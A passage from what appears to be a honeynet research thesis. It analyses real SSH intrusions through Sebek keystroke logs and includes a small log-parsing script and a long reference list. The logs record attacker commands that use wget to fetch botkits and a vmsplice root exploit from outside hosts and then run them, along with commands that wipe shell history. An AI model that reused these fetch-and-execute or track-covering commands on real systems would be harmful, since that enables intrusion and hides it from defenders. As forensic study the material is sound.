The attacker brute forced the server using an SSH scanner from 88.191.98.14 and immediately
connected to it using 91.22.242.105. After getting shell access as a user, the attacker checks for current
online users and system CPU information. Then he downloads his botkit onto the server. He then
extracts, configures and runs the botkit and, after verifying that everything is running successfully,
deletes the file. This particular hacker, however, doesn't seem to care much about covering his
tracks by deleting history, and leaves the history file intact (rather careless for a skillful hacker).
Deutsche Telekom was informed of this attack and the necessary logs were provided to block the attacker.
Table 15: Forensics: Coordinated Attacks
7.3.5. Local Privilege Escalation attempt
91.22.238.14 24th October, 2008
INTERPRETATION
The attacker gains access to the system, determines CPU information, downloads exploit
tools appropriate to the host architecture and OS, and attempts to escalate his privileges on the
system. This attempt was, however, not successful.
Sebek Logs:
w exit
ps x
ls
cat /proc/cpuinfo
exit
uname -a
sudo su
wget ciofu.altervista.org/xpl
chmod +x xpl
./xpl
w history
$ ls
Desktop Documents Examples Music Pictures Public Templates Videos xpl
john@paul-desktop:~$ ./xpl
----------------------------------
Linux vmsplice Local Root Exploit
By MarkyZuL
----------------------------------
[-] mmap: Permission denied
Table 16: Forensics: Local Privilege Escalation attempt
7.3.6. Forensics of an Encrypted Botnet
86.55.235.80 5th and 7th November:
/var/log/auth.log:Nov 5 20:01:22 paul-desktop sshd[21290]: Accepted password for john from 86.55.235.80 port 1684 ssh2
/var/log/auth.log:Nov 7 16:38:07 paul-desktop sshd[23247]: Accepted password for john from 86.55.235.80 port 2916 ssh2
[2008-11-05 07:01:32 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#w
[2008-11-05 07:01:40 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#uname -a
[2008-11-05 07:01:46 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#ps x
[2008-11-05 07:01:55 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#ls -a
[2008-11-05 07:02:10 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#cat .bash_history
[2008-11-05 07:03:17 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#cat /proc/cpuinfo
[2008-11-05 07:03:28 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#passwd
[2008-11-05 07:06:45 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#cd xpl
[2008-11-05 07:07:22 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#chmod +x xpl
[2008-11-05 07:09:47 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#./xpl
---------------------------------
Linux vmsplice Local Root Exploit
By MarkyZuL
-----------------------------------
[-] mmap: Permission denied
[2008-11-07 03:38:40 Host:130.195.4.20 UID:1001 PID:23251 FD:0 INO:3 COM:bash ]#wget
http://www12.asphost4free.com/mrtiger/psybnc-linux.tgz ; tar zxvf psybnc-linux.tgz ; cd psybnc-linux ; cd psybnc ; chmod
+x * ; ./psybnc
[2008-11-07 03:38:40 Host:130.195.4.20 UID:1001 PID:23251 FD:0 INO:3 COM:bash ]#ls -a
INTERPRETATION:
The attacker was aware of the password and connected in a single attempt. He then downloaded a psyBNC botkit
that listens on port 31337. psyBNC is an easy-to-use, multi-user, permanent IRC bouncer with many features.
Analysis of the 31337 logs yielded the nicks of the attackers: “braincode”, “impertinent” and “JSP”. A simple
Google search showed a server allowing open directory access, which had IRC files containing data from these 3
nicks:
http://203.188.159.61/cgvak/wq/
which is hosting Australian websites.
Table 17: Forensics of Encrypted Botnet
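Keystroke logs in the layout shown above lend themselves to simple automated parsing. The Python sketch below assumes exactly the line layout of the excerpt (timestamp, Host, UID, PID, FD, INO, COM, then the command after `]#`); the names `parse_sebek` and `commands_by_pid` are hypothetical and the pattern is not claimed to cover every Sebek output format.

```python
import re
from collections import defaultdict
from datetime import datetime

SEBEK_LINE = re.compile(
    r"\[(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) "
    r"Host:(?P<host>\S+) UID:(?P<uid>\d+) PID:(?P<pid>\d+) "
    r"FD:(?P<fd>\d+) INO:(?P<ino>\d+) COM:(?P<com>\S+) \]#(?P<command>.*)"
)


def parse_sebek(line):
    """Parse one keystroke record; return None for lines in another layout."""
    m = SEBEK_LINE.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%d %H:%M:%S")
    for field in ("uid", "pid", "fd", "ino"):
        rec[field] = int(rec[field])
    return rec


def commands_by_pid(lines):
    """Group the typed commands by shell PID to rebuild each session."""
    sessions = defaultdict(list)
    for line in lines:
        rec = parse_sebek(line)
        if rec is not None:
            sessions[rec["pid"]].append(rec["command"])
    return dict(sessions)


# Records copied from the excerpt, plus one line of exploit output.
excerpt = [
    "[2008-11-05 07:01:32 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#w",
    "[2008-11-05 07:01:40 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#uname -a",
    "[-] mmap: Permission denied",
    "[2008-11-07 03:38:40 Host:130.195.4.20 UID:1001 PID:23251 FD:0 INO:3 COM:bash ]#ls -a",
]
sessions = commands_by_pid(excerpt)
first = parse_sebek(excerpt[1])
```

Grouping by PID separates the two logins of 5th and 7th November into distinct command sequences, which can then be compared as behavioural profiles.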
7.3.6.3. Forensics of a Hacker’s IRC session
Observations and Comments:
After brute forcing into our Linux Honeypot, one attacker downloaded his botkit, then configured, compiled and executed
it, thus adding our Honeypot to his existing botnet chain originating from the Netherlands (195.47.220.2). The attackers
did not encrypt their IRC session; as a result we were able to collect and analyze logs from this plain-text IRC
session. Focusing on a single event, we see 4 hackers communicating under the aliases
“luv!~bido”, “Dracos!~Volk3R”, “Muzik! Mytzu” and “dog!~dog”. The language used by the attackers was checked
using Google Translate and was found to be Romanian. The attackers engaged in a very casual and
informal conversation, making fun of each other's skills, teasing and abusing each other, and in between
exchanging critical information on subnets scanned, vulnerabilities and vulnerable hosts, target IPs and, most
importantly, usernames and passwords set up on compromised hosts, all of it going over the wire in
plain text. To our excitement, while discussing some compromised hosts, hacker “luv!~bido” revealed FTP credentials for a
compromised machine in Germany (62.75.252.121). We now had credentials for a machine owned by the hackers
themselves.
Table 18: Forensic of a hackers IRC session
8. Achievements
• I have been successful in getting a paper published at the recent Australasian
Telecommunications Networks and Applications Conference (ATNAC, 2009),
held in Canberra, Australia in November, 2009.
• I have presented my paper there at Canberra, Australia.
• I have prepared a Poster on my work.
• I have set up a virtual Honeynet at Massey University.
• Collaborated with industry by setting up a Honeynet at a web-hosting company
known as Spinning Planet.
9. Research Plan
References:
[1] Spitzner.L (2002). Honeypots: Tracking Hackers. US: Addison Wesley. 1-430..
[2] Stoll, C. The Cuckoo’s Egg: Tracking a Spy Through the Maze of Computer
Espionage. Pocket Books, New York, 1990
[3] Cheswick, B. (1991). “An Evening with Berferd, in Which a Cracker Is Lured,
Endured, and Studied.” Forum of Incident Response and Security Teams
(FIRST).
[4] The Honeynet Project http://project.Honeynet.org
[5] CERT Advisory CA-2001-31 Buffer Overflow in CDE Subprocess Control
Service, http://www.cert.org/advisories/CA-2001-31.html
[6] Provos, N and Holz, T (July 26, 2007). Virtual Honeypots: From Botnet Tracking
to Intrusion Detection. US: Addison-Wesley Professional.
[7] Talabis, R. (2005). The Gen II and Gen III Honeynet Architecture. Available:
http://www.philippineHoneynet.org/index2.php?option=com_docmanandtask=doc
_viewandgid=11andItemid=29. Last accessed June, 2008.
[8] William Stallings, “Cryptography and Network Security Principles and Practices”,
Third Edition, Prentice Hall, 2003.
[9] Security architecture for open systems interconnection for CCITT applications,
ITU-T, Study Group VII - Data Communications Networks, 1991
[10] Snort user manual 2.8.3 , www.snort.org
[11] Know Your Enemy: Sebek, A kernel based data capture tool, The Honeynet
Project, http://www.Honeynet.org, Last Modified: 17 November 2003
[12] Shuja, F. (October, 2006). Virtual Honeynet: Deploying Honeywall using
VMware . Available: http://www.Honeynet.pk/Honeywall/index.htm. Last
accessed June, 2008.
[13] Robert McGrew, Rayford B. Vaughn, JR. Experiences With Honeypot Systems:
Development,Deployment, and Analysis. Proceedings of the 39th Hawaii
International Conference on System Sciences – 2006.
[14] Levine.J, LaBella.R, Owen.H, Contis.D, Culver.B. (2003). The Use of
Honeynets to Detect Exploited Systems. Proceedings of the 2003 IEEE. 3 (2),
[15] McGrew.R, Rayford B. Vaughn, JR. (2006). Experiences With Honeypot
Systems:Development, Deployment, and Analysis. Proceedings of the 39th
Hawaii International Conference on System Sciences.
[16] Edward, B and Camilo, Viecco. (2005). Towards a Third Generation Data
Capture Architecture for Honeynets. Proceedings of the 2005 IEEE, Workshop
on Information Assurance and Security, United States Military Academy, West
Point, NY. 1 (1), p21-28.
[17] Snort, 2006, SNORT - The de facto standard on Intrusion Detection and
Prevention, www.Snort.org
[18] VMware. (2008). VMware Server 1.0.6 Free.
Available: http://www.vmware.com/download/server . Last accessed 20 Aug
2008.
[19] VMware. (2006). VMware Server Virtual Machine Guide.Available:
http://pubs.vmware.com/server1/wwhelp/wwhimpl/js/html/wwhelp.htm . Last
accessed 2 August 2008.
[20] “The Honeynet Project, 1999”.
[21] Duncan Napier. IPTables/NetFilter – Linux’s next generation stateful packet
filter. Sys Admin: The Journal for UNIX Systems Administrators, 10(12):8, 10, 12,
14, 16, December 2001.
[22] The Honeynet Project. (2005). Know Your Enemy: Honeywall CDROM Roo.
Available: http://old.Honeynet.org/papers/cdrom/Roo/index.html. Last accessed 5
May 2008.
[23] V. N. Padmanabhan and L. Subramanian. Determining the geographic location
of Internet hosts. In SIGMETRICS/Performance, pages 324–325, 2001.
[24] Google.com. (2009). Google Translate. Available:
http://translate.google.com/ . Last accessed 15 December 2008.
[25] J. Oikarinen and D. Reed, “Internet Relay Chat Protocol RFC 1459,” 1993.
[26] Paul Barham , Boris Dragovic , Keir Fraser , Steven Hand , Tim Harris , Alex Ho
, Rolf Neugebauer , Ian Pratt , Andrew Warfield, Xen and the art of virtualization,
Proceedings of the nineteenth ACM symposium on Operating systems principles,
October 19-22, 2003, Bolton Landing, NY, USA
[27] VirtualBox. (2004). Sun VirtualBox® User Manual. Available:
http://www.virtualbox.org/manual/UserManual.html
Last accessed 20 July 2008.
[28] S. Marcinkowski, Extranets: The Weakest Link and Security, 2001.
[29] Arnold, T. (2001). A Method for Securing Credit Card and Private Consumer
Data in EBusiness Sites : CyberSource Corporation
[30] Defence in Depth: A practical strategy for achieving Information Assurance in
today’s highly networked environments
[31] S.L. Shaffer and A.R. Simon, Network Security, Academic Press, 1994.
[32] S.G. Schwartz, Practical Unix and Internet Security, 3rd Edition, O'Reilly Media,
Inc, 2003.
[33] M. Gasser, Building a secure computer system, 1988.
[34] Digital Forensics Research Workshop. “A Road Map for Digital Forensics
Research” 2001. www.dfrws.org
[35] Caloyannides, Michael A. Computer Forensics and Privacy. Artech House, Inc.
2001.
[36] S. Mukkamala and A.H. Sung, "Identifying Significant Features for Network
Forensic Analysis Using Artificial Intelligent Techniques," International Journal,
vol. 1, 2003, pp. 1-17.
[37] S. Hansman and R. Hunt, "A taxonomy of network and computer attacks,"
Computers and Security, vol. 24, 2005, pp. 31-43.
[38] E.D. Security, "A Guide to Cyber Crime Security in 2010," Security, 2009, p. 3.
[39] B. Cox, "Dress Your E-Security in Layers," internet.com, 2001, p. 1.
[40] Cohen, Frederick B., Protection and Security on the Information
Superhighway, John Wiley and Sons, Inc., 1995
[41] P. Innella, "A Brief History of Network Security and the Need for Adherence to
the Software Process Model," Information Security, 2008, pp. 1-15
[42] Lipson HF. Tracking and tracing cyber-attacks: technical challenges and global
policy issues. Technical report, CERT Coordination Center; November 2002.
[43] CERT, "CERT Statistics (Historical)," Incident Reports Received, 2009, p. 1.
[44] W. Stallings, Internet Security Handbook, IDG Books Worldwide, Inc., 1995.
[45] Alexander, Michael, The Underground Guide to Computer Security,
Addison-Wesley Publishing Company, 1996.
[46] CERT/CC, "CERT® Advisory CA-2003-04 MS-SQL Server Worm," CERT/CC,
Carnegie Mellon University, 2003, p. 1.
[47] CERT/CC, "CERT® Advisory CA-2003-20 W32/Blaster worm," CERT/CC,
Carnegie Mellon University., 2003, p. 1.
[48] CERT-In, "CERT-In Incident Note CIIN-2004-06," CERT-In, 2004, p. 1.
[49] Us-cert, "Technical Cyber Security Alert TA09-088A," National Cyber Alert
System, 2009, p. 1.
[50] P.J. Wade H. Baker Alex Hutton C. David Hylender, Christopher Novak
Christopher Porter Bryan Sartin Peter Tippett, M.D., "2009 Data Breach
Investigations Report," Business, 2009
[51] S. Northcutt and J. Novak, Network Intrusion Detection, New Riders, 2003.
[52] C. Kreibich and J. Crowcroft, "Honeycomb - creating intrusion detection
signatures using Honeypots," In Proceedings of the 2nd Workshop on Hot Topics
in Networks (HotNets-II) HotNets-II, 2003.
[53] J. Newsome, B. Karp, and D. Song, "Polygraph: Automatically generating
signatures for polymorphic worms," Proc. of the 2005 IEEE Symposium on
Security and Privacy, vol. pp, pp. 226-241, May 2005.
[54] M.M. Mohammed, H.A. Chan, and N. Ventura, "Honeycyber: automated
signature generation for zero-day polymorphic worms," Proc. of the IEEE Military
Communications Conference, MILCOM, 2008, pp. 1-6, 2008.
[55] H.-A. Kim and B. Karp, "Autograph: Toward automated, distributed worm
signature detection," Proc. of 13 USENIX Security Symposium, San Di- ego, CA,
Aug., 2004.
[56] S. Singh, C. Estan, G. Varghese, and S. Savage, "Automated worm
fingerprinting," Proc. Of the 6th conference on Symposium on Operating Systems
Design and Implementation (OSDI), Dec, 2004.
[57] J. Levine, R.L. Bella, H. Owen, D. Contis, and B. Culver, "The use of Honeynets
to detect exploited systems across large enterprise networks," Proc. of 2003
IEEE Workshops on Information Assurance, New York, Jun, 2003, pp. 92-99.
[58] Niels Provos. Honeyd - A Virtual Honeypot Daemon. In 10th DFN-CERT
Workshop, Hamburg, Germany, February 2003.
[59] J. Newsome, B. Karp, and D. Song, "Polygraph: Automatically generating
signatures for polymorphic worms," Proc. of the 2005 IEEE Symposium on
Security and Privacy, vol. pp, pp. 226-241, May, 2005.
[60] Z. Li, M. Sanghi, Y. Chen, M. Kao, and B.C. Hamsa, "Fast Signature Generation
for Zero-day Polymorphic Worms with Provable Attack Resilience," Proc. of the
IEEE Symposium on Security and Privacy, Oakland, CA, May, 2006.
[61] L. Cavallaro, A. Lanzi, L. Mayer, and M. Monga, "LISABETH: Automated
Content-Based Signature Generator for Zero-day Polymorphic Worms," Proc. of
the fourth international workshop on Software engineering for secure systems,
Leipzig, Germany, May, 2008.
[62] M.M. Mohammed, H.A. Chan, and N. Ventura, "Honeycyber: automated
signature generation for zero-day polymorphic worms," Proc. of the IEEE Military
Communications Conference, MILCOM, 2008, pp. 1-6.
[63] R.Sommer and V. Paxson. Enhancing byte-level network intrusion detection
signatures with context. In 10th ACM Conference on Computer and
Communication Security (CCS), Washington, DC, October 2003
[64] R. Agrawal, T. Imielinski, and A. Swami. Mining association rules between sets
of items in large databases. In ACM SIGMOD International Conference on
Management of Data, 1993.
[65] F. Pouget and M. Dacier. Honeypot-based forensics. In AusCERT Asia Pacific
Information technology Security Conference 2004 (AusCERT2004), Brisbane,
Australia, May 2004.
[66] K. Julisch. Clustering intrusion detection alarms to support root cause analysis.
ACM Transactions on Information and System Security (TISSEC), 6(4):443–471,
November 2003.
[67] M. Christodorescu, S. Seshia, S. Jha, D. Song, and R. E. Bryant. Semantics-aware
malware detection. In IEEE Symposium on Security and Privacy, Oakland,
California, May 2005.
[68] J. Jung, V. Paxson, A. W. Berger, and H. Balakrishnan. Fast port-scan
detection using sequential hypothesis testing. In IEEE Symposium on Security
and Privacy, Oakland, California, May 2004
[69] S. Staniford, J. A. Hoagland, and J. M. McAlerney. Practical automated
detection of stealthy portscans. Journal of Computer Security, 10(1/2):105–136,
2002.
[70] V. Yegneswaran, J. Giffin, P. Barford, and S. Jha, "An architecture for
generating semantics-aware signatures," Proc. of the 14th conference on
USENIX Security Symposium, 2005.
[71] Yong Tang and Shigang Chen, "An Automated Signature-Based Approach against
Polymorphic Internet Worms," IEEE Transactions on Parallel and Distributed
Systems, pp. 879-892, July 2007.
[72] Yi-Min Wang et al, “Automated Web Patrol with Strider HoneyMonkeys: Finding
Web Sites That Exploit Browser Vulnerabilities,” Proc. of the 4th ACM
SIGPLAN/SIGOPS international conference on Virtual execution environments,
pp. 171-180, Seattle, WA, USA, 2008.
[73] W. E. Leland, M. S. Taqqu, W. Willinger, and D. V. Wilson, “On the self-similar
nature of ethernet traffic (extended version),” IEEE/ACM Trans. Networking, vol.
2, pp. 1–15, Feb. 1994.
[74] D.E. Denning, "An Intrusion-Detection Model," IEEE Transactions on
Software Engineering, vol. SE-13, 1987, pp. 222-232.
[75] Varun Chandola, Arindam Banerjee, and Vipin Kumar, Anomaly Detection: A
Survey, ACM Computing Surveys, Vol. 41(3), Article 15, July 2009
[76] V.V. Phoha, "The Springer Internet Security Dictionary," Springer-Verlag,
2002.
[77] Wikipedia, "Behaviour," 2010, p. 1.
[78] J.M. Estevez-Tapiador, P. Garcia-Teodoro and J.E. Diaz-Verdejo, “Anomaly
detection methods in wired networks: a survey and taxonomy,” Computer
Communications 27, pp. 1569-1584, 2004.
[79] S.Y. Lim and A. Jones, "Network Anomaly Detection System: The State of
Art of Network Behaviour Analysis," Security, 2008, pp. 459-465.
[80] K. Scarfone and P. Mell, Guide to Intrusion Detection and Prevention Systems
(IDPS), tech. report 800-94, Nat’l Inst. Standards and Technology, US Dept. of
Commerce, 2007.
[81] M. Pe, M. Grill, and J. Stiborek, "Adaptive Multiagent System for Network Traffic
Monitoring," Intelligent Systems, IEEE, vol. 24, 2009, pp. 16 - 25.
[82] "Fuzzy Clarity: Using Fuzzy Hashing Techniques to Identify Malicious
Code," 2007, pp. 1-18.
[83] A. Tridgell, "SpamSum," 2003,
http://samba.org/ftp/unpacked/junkcode/spamsum/README
[84] "Unveiling the Security Illusion: The need for active network forensics," Solera
Networks, 2010, p. 11.
[85] M. Li and P.M.B. Vitányi. An Introduction to Kolmogorov Complexity and its
Applications, Springer-Verlag, New York, 2nd Edition, 1997.
[86] R. Cilibrasi and P. Vitányi, "Clustering by compression," IEEE Trans.
Information Theory, vol. 51, no. 4, 2005, pp. 1523-1545.
[87] R. Cilibrasi, The CompLearn Toolkit, 2003,
http://complearn.sourceforge.net/.
[88] S. Wehner, "Analyzing Worms and Network Traffic using Compression," Work,
2008.
[89] H. Flake, "Structural comparison of executable objects," in DIMVA,
2004, pp. 161-173.
[90] E. Carrera and F.C. Team, "2. Programming ida pro," 2004, pp. 187-197.
[91] A. Kulkarni and S. Bush. Active network management and Kolmogorov
complexity. OpenArch 2001, Anchorage, Alaska, 2001.
[92] S. Evans and B. Barnett, "Network Security Through Conservation of
Complexity," MILCOM, 2002.
[93] A. Kulkarni, S. Bush, and S. Evans, "Detecting distributed denial-of-service
attacks using Kolmogorov complexity metrics," GE CRD Technical Report,
2001.
[94] M. Bailey, J. Oberheide, J. Andersen, Z.M. Mao, F. Jahanian, and J. Nazario,
"Automated Classification and Analysis of Internet Malware," Electrical
Engineering, 2007, pp. 1-18.
APPENDICES
APPENDIX - A
Sebek Logs
[2008-09-20 23:01:44 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#w
[2008-09-20 23:01:48 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#who
[2008-09-20 23:02:54 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cat /proc/cpuinfo
[2008-09-20 23:02:59 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#w
[2008-09-20 23:03:07 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ps x
[2008-09-20 23:03:14 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#kill -9 10796
[2008-09-20 23:03:15 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#w
[2008-09-20 23:03:16 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd
[2008-09-20 23:03:18 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#passwd
[2008-09-20 23:03:36 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#uname -a
[2008-09-20 23:04:14 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls[BS][BS][BS]last
[2008-09-20 23:04:23 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ps x
[2008-09-20 23:04:24 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#history
[2008-09-20 23:04:27 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd .tmp
[2008-09-20 23:04:28 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls
[2008-09-20 23:04:29 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd /tmp
[2008-09-20 23:04:29 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls
[2008-09-20 23:04:32 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd /var/tmp
[2008-09-20 23:04:32 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls
[2008-09-20 23:04:34 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd /tmp
[2008-09-20 23:04:36 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#wget www.idol.altervista.org/fish.tgz
[2008-09-20 23:04:53 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#tar xzvf fish.tgz
[2008-09-20 23:04:53 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd a
[2008-09-20 23:04:59 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#chmod +x *
[2008-09-20 23:05:03 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#./x 41.243 22
[2008-09-20 23:05:15 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd
[2008-09-20 23:05:17 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd /tmp
[2008-09-20 23:05:17 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#s
[2008-09-20 23:05:19 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls
[2008-09-20 23:05:20 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls
[2008-09-20 23:05:23 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#rm -rf a
[2008-09-20 23:05:29 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#[U-ARROW][BS]fas[BS][BS]ish.tgz
[2008-09-20 23:05:30 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd
[2008-09-20 23:05:32 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd /tmp
[2008-09-20 23:06:14 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#wget www12.asphost4free.com/postcard/fast.tar.gz
[2008-09-20 23:06:57 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd
[2008-09-20 23:06:59 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls
[2008-09-20 23:07:00 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#w
[2008-09-20 23:07:03 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd va/rmtp
[2008-09-20 23:07:04 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls
[2008-09-20 23:07:08 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd v[BS]/tmp
[2008-09-20 23:07:09 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#wget www12.asphost4free.com/postcard/fast.tar.gz
[2008-09-20 23:07:24 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#wget members.lycos.co.uk/carbalano/bido.jpg
[2008-09-20 23:07:52 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#curl
[2008-09-20 23:07:58 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#w
[2008-09-20 23:07:59 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd
[2008-09-20 23:08:14 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#w
[2008-09-20 23:08:17 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#cd /tmp
[2008-09-20 23:08:18 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#ls
[2008-09-20 23:08:32 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#wget www12.asphost4free.com/postcard/fast.tar.gz
[2008-09-20 23:10:29 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#cd
[2008-09-20 23:10:29 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#ls
[2008-09-20 23:10:30 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#w
[2008-09-20 23:12:45 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#cd /tmp
[2008-09-20 23:12:46 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#ls
[2008-09-20 23:12:53 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#tar zxvf fast.tar.gz
[2008-09-20 23:12:55 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#cd fast
[2008-09-20 23:12:57 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#chmod +x *
[2008-09-20 23:13:00 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#./linux
[2008-09-20 23:13:02 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#cd
[2008-09-20 23:13:02 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#ls
[2008-09-20 23:13:02 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#w
[2008-09-20 23:13:08 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#unset HISTFILE
[2008-09-20 23:13:08 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#unset BASHFILE
[2008-09-20 23:13:08 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#unset HISTSAVE
[2008-09-20 23:13:08 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#history -n
[2008-09-20 23:13:08 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#unset WATCH
[2008-09-20 23:13:08 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#export HISTFILE=/dev/null
[2008-09-20 23:13:09 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#rm -rf .bash_history
[2008-09-21 02:23:12 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:23:19 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77360 COM:bash ]#Documents
[2008-09-21 02:23:19 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd Do
[2008-09-21 02:23:19 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:23:21 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd ..
[2008-09-21 02:23:24 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77371 COM:bash ]#Pictures
[2008-09-21 02:23:24 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd Pic
[2008-09-21 02:23:25 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:23:26 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd ..
[2008-09-21 02:23:30 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77379 COM:bash ]#/tmp
[2008-09-21 02:23:30 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd /t
[2008-09-21 02:23:30 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:23:38 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77387 COM:bash ]#fast
[2008-09-21 02:23:38 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd fas
[2008-09-21 02:23:39 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:23:43 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd ..
